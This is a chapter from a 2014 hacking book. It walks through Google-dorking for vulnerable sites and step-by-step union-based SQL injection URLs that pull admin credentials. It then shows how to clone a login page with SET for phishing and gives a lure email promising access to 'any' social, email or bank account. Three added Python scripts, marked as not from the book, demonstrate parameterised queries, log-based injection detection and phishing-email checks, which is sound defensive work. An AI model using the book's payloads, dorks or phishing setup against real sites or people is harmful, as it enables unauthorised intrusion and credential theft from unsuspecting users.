Website Hacking - A Hacker's Life Starter: Security Penetration Anywhere & Anytime (2014)

Chapter 6. Website Hacking

We will cover:

* History of SQL injection

* Understanding SQL injection

* Simple SQL-injection

* Introduction to Phishing

* Performing Phishing

Sometimes you may want to hack a website you made yourself to see how it holds up. Or maybe a friend or a client has asked you to test his website to see whether it is vulnerable, and then website hacking comes in handy.

History of SQL injection

The language SEQUEL was developed by the IBM corporation. Relational Software, which is now known as Oracle, introduced its implementation of SQL in 1979. After many tests it became available for use between 1979 and 1983.

From that language on, people started writing malicious code, and one result was SQL injection, used to attack websites and applications. SQL injection was considered one of the top 10 vulnerabilities in 2007 and 2010, and in 2013 it was the number one attack method.

Understanding SQL-injection

SQL injection uses a publicly reachable input of a web application to get at the database behind it. SQL commands are entered into a form field in place of the normal input, such as the account login. Once those commands reach the database, they can also be used to find the other databases on the same server. Suitable places to try SQL injection are contact forms, feedback fields, shopping carts and many more; most such fields pass their contents on to SQL commands.

Necessary things

What is needed to hack a business depends on factors such as the size of the business, its age, the update status and patch level of its applications, and the number of staff. It also depends on what you are about to attack and on how well your tools are designed.

Types of SQL injection attacks

* Authentication Bypass

* Information Disclosure

* Compromised Data Integrity

* Compromised Availability of Data

* Remote Command Execution

Simple SQL-injection

SQL injection can be used against contact forms, feedback fields, shopping carts and many more; most such fields pass their contents on to SQL commands. But nowadays it is really difficult to do an SQL injection on many sites, because most of them come well protected against it.
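To make concrete what “protected” means here, the following Python snippet is an added example, not code from the book. It builds a small in-memory SQLite database standing in for a site's backend (SQLite instead of MySQL only so that it runs offline; the behaviour shown is the same), with a pages table behind an index.php?id= style lookup and an admin table named after the chapter's later examples; the rows are constructed. It runs the same lookup two ways: with the id pasted into the SQL text, which is the hole the rest of the chapter probes, and with the id bound as a parameter, which closes it.

```python
import sqlite3


def build_db():
    """Constructed in-memory stand-in for the site's database (SQLite instead of MySQL).

    Table and column names echo the chapter's walkthrough; the rows are made up."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER, title TEXT, body TEXT)")
    conn.execute("CREATE TABLE admin (admin_id INTEGER, admin_password TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?)",
                     [(1, "Home", "Welcome"), (2, "About", "About us")])
    conn.execute("INSERT INTO admin VALUES (1, 'not-a-real-hash')")  # constructed sample row
    return conn


def lookup_page_vulnerable(conn, page_id):
    """The index.php?id=... lookup done the wrong way: the raw parameter is glued
    into the SQL text, so the database parses whatever the visitor typed.

    Returns {"rows": [...], "error": None} on success, or the database's error text,
    which is exactly what the chapter's id=2' test looks for on the page."""
    sql = "SELECT id, title, body FROM pages WHERE id=" + page_id
    try:
        return {"rows": conn.execute(sql).fetchall(), "error": None}
    except sqlite3.Error as exc:
        return {"rows": [], "error": str(exc)}


def lookup_page_safe(conn, page_id):
    """The same lookup with a bound parameter. The SQL text is fixed; the value
    travels separately and is only ever compared against the id column, so a
    quote, an ORDER BY or a UNION inside it is just a string that matches nothing.
    (Checking that id is an integer before querying is a sensible extra layer,
    but the binding is what removes the injection.)"""
    return conn.execute("SELECT id, title, body FROM pages WHERE id=?", (page_id,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    probes = [
        "2",                                                     # normal request
        "2'",                                                    # step 3: quote test
        "2 order by 3",                                          # step 4: column count, in range
        "2 order by 4",                                          # step 4: one too many
        "-2 union select 1,admin_id,admin_password from admin",  # steps 6-17 collapsed into one
    ]
    for p in probes:
        print(f"id={p!r}")
        print("  concatenated: ", lookup_page_vulnerable(db, p))
        print("  parameterised:", lookup_page_safe(db, p))
```

Run it and compare the two columns of output: the concatenated version leaks a syntax error for the quote, an "out of range" error for order by 4, and the admin row for the union; the parameterised version returns the About page for id=2 and an empty result for everything else, with no error to read.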

Doing a SQL-injection

1. First, go to Google.com and search for vulnerable sites. To find them, type one of these keywords:

inurl:pageid=

inurl:index.php?id=

inurl:/login.php

2. Once you have searched for one of those keywords in Google, you will get a list of sites. Your task is to visit these sites one by one and check whether they are vulnerable.

3. Once you are on a site, add a single quote at the end of its URL and hit Enter. For example:

http://www.testing_site.com/index.php?id=2'

If the page stays the same or shows “page not found”, the site is not vulnerable.

If instead you get an error message like this one, the site is vulnerable:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line

4. Awesome, you found a vulnerable website. Now we need to find the number of columns present in the target database. To do that, replace the single quote (') with an “order by 1”, “order by 2”, “order by 3”, “order by 4,5,6,7…” statement.

For example:

http://www.testing_site.com/index.php?id=2 order by 1

http://www.testing_site.com/index.php?id=2 order by 2

http://www.testing_site.com/index.php?id=2 order by 3

http://www.testing_site.com/index.php?id=2 order by 4

Keep increasing the number until you get an error like “unknown column”.

If the above method does not work for you, try adding "--" at the end of the statement:

http://www.testing_site.com/index.php?id=2 order by 1--

http://www.testing_site.com/index.php?id=2 order by 2--

http://www.testing_site.com/index.php?id=2 order by 3--

http://www.testing_site.com/index.php?id=2 order by 4--

http://www.testing_site.com/index.php?id=2 order by 5--

5. Finding the vulnerable columns

Now let’s find the vulnerable columns by trying the query "union select columns_sequence".

6. Now change the id value to a negative number (id=-2). Then replace columns_sequence with the numbers from 1 to x-1, separated by commas (,), where x is the number at which the “unknown column” error appeared:

http://www.testing_site.com/index.php?id=-2 union select 1,2,3,4,5,6,7--

When this query executes, the page shows you which columns are vulnerable. In this example, columns 3 and 7 are vulnerable. Let’s take column 3 first.

7. Replace column 3 in the query with “version()”.

For example

http://www.testing_site.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--

This should display the version, for example 5.0.1 or 4.3.

8. Replace version() with database() and user() to find the database name and the database user respectively.

For example:

http://www.testing_site.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--

If nothing happens or something goes wrong, try this one:

http://www.testing_site.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--

9. We are almost done. All that we have to do now is find the table name.

To do that, replace the 3 with group_concat(table_name) and append "from information_schema.tables where table_schema=database()--" to the query.

For example:

http://www.testing_site.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--

10. This will show you a list of table names. It is up to you to find the table that is related to users or admins.

11. Now replace group_concat(table_name) with group_concat(column_name).

12. Also replace "from information_schema.tables where table_schema=database()--" with "from information_schema.columns where table_name=mysqlchar--".

Here mysqlchar stands for the table name converted to a MySQL CHAR() string, which we do next.

13. It would be great if you installed the HackBar add-on right now (see Figure 6-1).

Figure 6-1 shows how it looks when you are about to download the script.

Once it is installed, a toolbar appears. Press F9 to show or hide it (see Figure 6-2).

Figure 6-2 shows the HackBar in action, ready to start hacking.

14. In the HackBar go to SQL -> MySQL -> MysqlChar().

It asks for the string we want to convert to MySQL CHAR(). Type the table name, then put the resulting code at the end of the URL in place of "mysqlchar".

For example:

http://www.testing_site.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--

15. Now you should see the list of columns.

For example:

admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pass,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..

16. Next, replace group_concat(column_name) with group_concat(columnname1,0x3a,anothercolumnname2). (0x3a is a colon, used to separate the two values.)

17. Now replace "from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with "from table_name".

For example:

http://www.testing_site.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--

18. This should show the data stored in the table, depending on the column names. If all of these queries give an error message, try other column names from the list.

19. Now try one of these URLs to find the administrator login page:

http://www.testing_site.com/admin.php
http://www.testing_site.com/admin/
http://www.testing_site.com/admin.html
http://www.testing_site.com:2082/

After a few failed tries, you will end up at the administrator page using one of these example URLs.
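Seen from the server side, every step of the walkthrough above leaves a distinctive request in the web server's access log: a lone quote after a numeric id, a run of order by N probes, then union select together with information_schema and group_concat. The following Python script is an added example, not code from the book. It parses a handful of constructed Apache-style combined-format log lines (client addresses from the documentation ranges) and tags the requests that match those stages, which is how a defender spots the enumeration while it is still going on. The signature names and the log-format regex are my own assumptions rather than any standard.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, unquote, urlsplit

# Apache/nginx "combined" format (an assumption about the log layout; adjust for other servers).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Each signature mirrors one stage of the walkthrough; the names are my own labels.
SIGNATURES = [
    ("quote-probe",   re.compile(r"^\d+'\s*$")),                                  # id=2'        (step 3)
    ("order-by-enum", re.compile(r"(?i)\border\s+by\s+\d+")),                     # order by N   (step 4)
    ("union-select",  re.compile(r"(?i)\bunion\b.*\bselect\b")),                  # union select (step 6)
    ("schema-read",   re.compile(r"(?i)information_schema\.(tables|columns)")),   # steps 9 and 12
    ("mysql-funcs",   re.compile(r"(?i)\b(version|database|user|group_concat|char)\s*\(")),  # steps 7-14
    ("comment-tail",  re.compile(r"--\s*$|#$")),                                  # trailing SQL comment
]

# Constructed sample log: one client walking through the chapter's probes, one normal visitor.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2014:13:55:36 +0000] "GET /index.php?id=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Mar/2014:13:55:40 +0000] "GET /index.php?id=2%27 HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Mar/2014:13:55:48 +0000] "GET /index.php?id=2%20order%20by%204-- HTTP/1.1" 500 318 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Mar/2014:13:56:02 +0000] "GET /index.php?id=-2%20and%201=2%20union%20select%201,2,version(),4,5,6,7-- HTTP/1.1" 200 5210 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Mar/2014:13:56:30 +0000] "GET /index.php?id=-2%20union%20select%201,2,group_concat(table_name),4,5,6,7%20from%20information_schema.tables%20where%20table_schema=database()-- HTTP/1.1" 200 5300 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Mar/2014:13:57:01 +0000] "GET /index.php?id=3 HTTP/1.1" 200 4980 "-" "Mozilla/5.0"',
]


def classify_request(target):
    """Return the set of signature names matched by any query-string value of a request target."""
    query = urlsplit(target).query
    hits = set()
    for values in parse_qs(query, keep_blank_values=True).values():
        for value in values:
            value = unquote(value)  # second decode catches double-encoded probes; harmless otherwise
            for name, pattern in SIGNATURES:
                if pattern.search(value):
                    hits.add(name)
    return hits


def scan_access_log(lines):
    """Parse combined-format lines and return one alert per request that matches a signature."""
    alerts = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # not a combined-format line; skip it rather than guess
        tags = classify_request(match["target"])
        if tags:
            alerts.append({
                "ip": match["ip"],
                "time": match["time"],
                "status": match["status"],
                "target": match["target"],
                "tags": sorted(tags),
            })
    return alerts


def summarize_by_ip(alerts):
    """Count flagged requests per client; a run from one address is the enumeration pattern."""
    return Counter(alert["ip"] for alert in alerts)


if __name__ == "__main__":
    found = scan_access_log(SAMPLE_LOG)
    for alert in found:
        print(alert["ip"], alert["status"], ",".join(alert["tags"]), alert["target"])
    print(dict(summarize_by_ip(found)))
```

Two details matter in practice: the quote and order-by probes often come back with status 200 and a normal-looking page size, so the status code alone will not flag them, and a quiet site might see a 500 from order by 4 as the first sign. Grouping by client address, as summarize_by_ip does, turns a few individually weak matches into a clear sequence.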

Introduction to Phishing

Phishing is a method for hacking into people’s accounts by sending them an email that looks legitimate, with the purpose of retrieving the recipient’s financial information. Most of the time the message appears to come from a trustworthy website, for example an online banking site, a social network or an online shopping site.

One of the most common ways to fool a victim is to claim in the message that there has been fraudulent activity on the victim’s account, and to put a “click here” link at the bottom to verify the information.

Whaling

This type of phishing is specifically directed at high-ranking people inside a business or organization.

Spear phishing

This one is focused on people who have some connection with the organization.

Performing Phishing

Here I’m about to show you how you can hack any social network account, email account or even a bank account by using the phishing method to retrieve the user’s account information.

Phishing consists of the following steps, which I call Manual Phishing:

1. Copy the login page

2. Search for the code line inside source code

3. Make some changes inside the code

4. Create a free hosting account. Most of the time your account gets suspended, because hosting a phishing site is against the rules.

5. Upload the fake Login Page you created on the hosting site.

6. Send a fake email to your victim

7. Last but not least, retrieve the information the victim entered.

But this takes time and work: saving the “index.html” file to your computer and then uploading it to a web server, and it does not always work. So I found a way that is much easier and more exciting in BackTrack (not installed in a virtual machine, but either booted from a live CD or fully installed on your hard disk, or else it won't work). I call it Automated Phishing:

1. First boot BackTrack to the desktop and open the terminal.

2. To read your IP address, type:

ifconfig

3. Next, go to the pentest folder by typing:

cd /pentest/exploits/set

4. Now that we are in the folder, type:

./set

(Press Y to agree to the terms.)

5. Select 1 for Social-Engineering Attacks

6. Now we choose 2 to select the Website Attack Vectors.

7. We now select 4 for “Tabnabbing Attack Method”.

8. We now select 2 for Site Cloner.

9. Enter the IP address of the machine you are using, which you read earlier.

10. In this step, enter the address of the site you want to make a phishing page of. Again, it could be ANY social network or email site, for example: http://www.ffthesocialnetwork_or_emailsite.com/

11. After a few moments of waiting it asks you to press Return, so press “Enter” (see Figure 6-3).

Figure 6-3 shows how it looks when it is ready to start.

12. What has actually happened is that your IP address is now the link to your phishing page.

13. The next step is to make the link shorter. To do so, go to http://goo.gl/, paste the link and click Shorten URL (see Figure 6-4).

Figure 6-4 shows the Google URL shortener in action.

14. There you have it; test whether the link works. Now email or message the link to a friend who can handle this prank, or to yourself for educational purposes.

15. When the ID and password are entered, you will receive them in your terminal. (So leave the terminal open and do not restart the PC until then, otherwise the IP might change.)

Writing the Email

Now your website is ready; the only thing missing is to write your fake email with your link inside it. Take a moment to analyze this fake letter.

Dear Customer

We regret to inform you that we had to lock your account access because we have reasons to believe that it may have been compromised by outside parties.

In order to protect your sensitive information, we temporarily suspended your account access.

Click here to verify and reactivate your account access by completing the secure form that will appear. This security measure will ensure that you are the only person with access to the account. Thank you for your time and consideration in this matter.

Please do not reply to this message

For any inquiries, contact Customer Service.

As you can see, the guy who wrote this did a bit of research on the victim’s life and personal information before writing this phishing mail. And that’s exactly what phishing is all about. Don’t try this at home.
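The letter above carries the marks a mail filter or a trained reader looks for: urgency words like “suspended” and “compromised”, a “click here” link whose destination is a URL shortener or a bare IP address, as in the automated setup described earlier, and plain http. The following Python script is an added example, not from the book. It wraps the chapter's letter in constructed HTML with two constructed links (a goo.gl placeholder path and an address from the documentation IP range), extracts the links, compares each against the domain the mail claims to come from, and scores the wording. The shortener list, the lure phrases, the reason names and the claimed domain example.com are assumptions made for the demonstration.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumptions for the demonstration: a few well-known shortener hosts and the urgency
# phrases that recur in lures like the chapter's letter. Extend both for real use.
SHORTENERS = {"goo.gl", "bit.ly", "tinyurl.com", "t.co"}
LURE_PHRASES = ["lock", "compromised", "suspended", "click here", "verify", "reactivate"]

# Constructed sample: the chapter's letter as HTML with two constructed links, one through a
# shortener (placeholder path) and one to a bare address from the documentation IP range.
SAMPLE_EMAIL_HTML = """
<html><body>
<p>Dear Customer</p>
<p>We regret to inform you that we had to lock your account access because we have
reasons to believe that it may have been compromised by outside parties.</p>
<p>In order to protect your sensitive information, we temporarily suspended your account access.</p>
<p><a href="http://goo.gl/EXAMPLE">Click here</a> to verify and reactivate your account access
by completing the secure form that will appear.</p>
<p>Please do not reply to this message. For any inquiries, contact
<a href="http://198.51.100.23/support">Customer Service</a>.</p>
</body></html>
"""


class LinkExtractor(HTMLParser):
    """Collect (href, visible text) for every anchor, plus the message's full visible text."""

    def __init__(self):
        super().__init__()
        self.links = []
        self.text = []
        self._href = None
        self._anchor_text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._anchor_text = []

    def handle_data(self, data):
        self.text.append(data)
        if self._href is not None:
            self._anchor_text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._anchor_text).strip()))
            self._href = None


def host_of(url):
    return (urlsplit(url).hostname or "").lower()


def is_ip_host(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def assess_link(href, text, claimed_domain):
    """Reasons a link is suspect, relative to the domain the mail claims to come from."""
    reasons = []
    host = host_of(href)
    if is_ip_host(host):
        reasons.append("raw-ip-host")          # the cloned page is served straight from an IP
    if host in SHORTENERS:
        reasons.append("url-shortener")        # the shortened link hides where it really goes
    if urlsplit(href).scheme == "http":
        reasons.append("plain-http")           # a bank login over plain http is a warning in itself
    text_host = host_of(text) if "://" in text else ""
    if text_host and text_host != host:
        reasons.append("text-href-mismatch")   # visible URL says one host, the link goes to another
    if host and not (host == claimed_domain or host.endswith("." + claimed_domain)):
        reasons.append("off-brand-domain")
    return reasons


def lure_score(visible_text):
    """Number of urgency phrases present; the chapter's letter hits every one of them."""
    lowered = " ".join(visible_text.split()).lower()
    return sum(1 for phrase in LURE_PHRASES if phrase in lowered)


def assess_email(html, claimed_domain):
    """Extract links, judge each against the claimed domain, and score the wording."""
    parser = LinkExtractor()
    parser.feed(html)
    links = [{"href": h, "text": t, "reasons": assess_link(h, t, claimed_domain)}
             for h, t in parser.links]
    score = lure_score("".join(parser.text))
    suspicious = score >= 3 or any(link["reasons"] for link in links)
    return {"links": links, "lure_score": score, "verdict": "suspicious" if suspicious else "clean"}


if __name__ == "__main__":
    report = assess_email(SAMPLE_EMAIL_HTML, "example.com")  # the brand the mail pretends to be
    print("lure score:", report["lure_score"], "->", report["verdict"])
    for link in report["links"]:
        print(f'  "{link["text"]}" -> {link["href"]}: {", ".join(link["reasons"]) or "ok"}')
```

The link checks are the dependable part: a real bank never sends its customers to a shortener or an IP address, so a single one of those reasons is enough to hold the message. The phrase score is deliberately weak on its own, since legitimate security notices use the same vocabulary; it is there to rank messages for a human, not to decide by itself.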

Small summary ahead

* SQL injection is used to gain entries from the available public entry to the database.

* Suitable places for SQL injection are contact forms, feedback fields, shopping carts and many more. Most of the fields allow for SQL commands.

* Phishing is a method for hacking into people’s accounts by sending them an email that looks legitimate, with the purpose of retrieving the recipient’s financial information.

* There are two types of phishing: whaling and spear phishing.